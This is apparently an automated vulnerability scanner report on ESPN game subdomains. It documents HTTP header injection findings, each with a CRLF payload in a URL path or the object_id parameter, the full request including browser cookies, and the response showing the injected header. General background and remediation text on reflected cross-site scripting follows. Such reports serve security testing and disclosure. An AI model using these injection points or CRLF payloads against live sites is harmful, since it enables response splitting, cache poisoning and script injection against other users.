HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 2 is copied into the Location response header. The payload f3394%0d%0a260e20407d2 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pokerpickem/f3394%0d%0a260e20407d2/frontpage HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1
Location: /pokerpickem/en/f3394
260e20407d2/frontpage
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/f3394 260e20407d2/frontpage">/pokerpickem/en/f3394 260e20407d2/frontpage</A>.<BODY></HTML ...[SNIP]...
The value of REST URL parameter 2 is copied into the Location response header. The payload 4ec69%0d%0a484c4d23469 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pokerpickem/4ec69%0d%0a484c4d23469/group HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 193
Content-Type: text/html; charset=iso-8859-1
Location: /pokerpickem/en/4ec69
484c4d23469/group
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/4ec69 484c4d23469/group">/pokerpickem/en/4ec69 484c4d23469/group</A>.<BODY></HTML>
The value of REST URL parameter 2 is copied into the Location response header. The payload a807e%0d%0a898e11a593d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Request
GET /pokerpickem/a807e%0d%0a898e11a593d/story HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 193
Content-Type: text/html; charset=iso-8859-1
Location: /pokerpickem/en/a807e
898e11a593d/story
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/pokerpickem/en/a807e 898e11a593d/story">/pokerpickem/en/a807e 898e11a593d/story</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload db6fa%0d%0a57ddd8e895b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /db6fa%0d%0a57ddd8e895b HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 157
Content-Type: text/html; charset=iso-8859-1
Location: /en/db6fa
57ddd8e895b
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/db6fa 57ddd8e895b">/en/db6fa 57ddd8e895b</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 31be1%0d%0a5bb07d47379 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /31be1%0d%0a5bb07d47379/ HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 159
Content-Type: text/html; charset=iso-8859-1
Location: /en/31be1
5bb07d47379/
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/31be1 5bb07d47379/">/en/31be1 5bb07d47379/</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 1babd%0d%0a818dc4039b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1babd%0d%0a818dc4039b8/conversation HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 183
Content-Type: text/html; charset=iso-8859-1
Location: /en/1babd
818dc4039b8/conversation
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/1babd 818dc4039b8/conversation">/en/1babd 818dc4039b8/conversation</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 6d6b6%0d%0a1e751f105f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6d6b6%0d%0a1e751f105f3/createOrUpdateEntry HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 197
Content-Type: text/html; charset=iso-8859-1
Location: /en/6d6b6
1e751f105f3/createOrUpdateEntry
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/6d6b6 1e751f105f3/createOrUpdateEntry">/en/6d6b6 1e751f105f3/createOrUpdateEntry</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 60040%0d%0a06f626c9e72 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /60040%0d%0a06f626c9e72/entry HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 169
Content-Type: text/html; charset=iso-8859-1
Location: /en/60040
06f626c9e72/entry
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/60040 06f626c9e72/entry">/en/60040 06f626c9e72/entry</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 63b5f%0d%0acf2b0e791bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /63b5f%0d%0acf2b0e791bb/entryStats HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 179
Content-Type: text/html; charset=iso-8859-1
Location: /en/63b5f
cf2b0e791bb/entryStats
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/63b5f cf2b0e791bb/entryStats">/en/63b5f cf2b0e791bb/entryStats</A>.<BODY></HTML>
The value of REST URL parameter 1 is copied into the Location response header. The payload 7b78a%0d%0a54f670ab62 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /7b78a%0d%0a54f670ab62/story HTTP/1.1
Host: streak.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 302 Moved Temporarily
Connection: close
Content-Length: 167
Content-Type: text/html; charset=iso-8859-1
Location: /en/7b78a
54f670ab62/story
Server: barista/3.3.6
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/en/7b78a 54f670ab62/story">/en/7b78a 54f670ab62/story</A>.<BODY></HTML>
The value of the object_id request parameter is copied into the Location response header. The payload 3ca92%0d%0a5d6cccec3bc was submitted in the object_id parameter. This caused a response containing an injected HTTP header.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="/ci/content/submit/comm ...[SNIP]...
2. Cross-site scripting (reflected)
There are 155 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc.).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
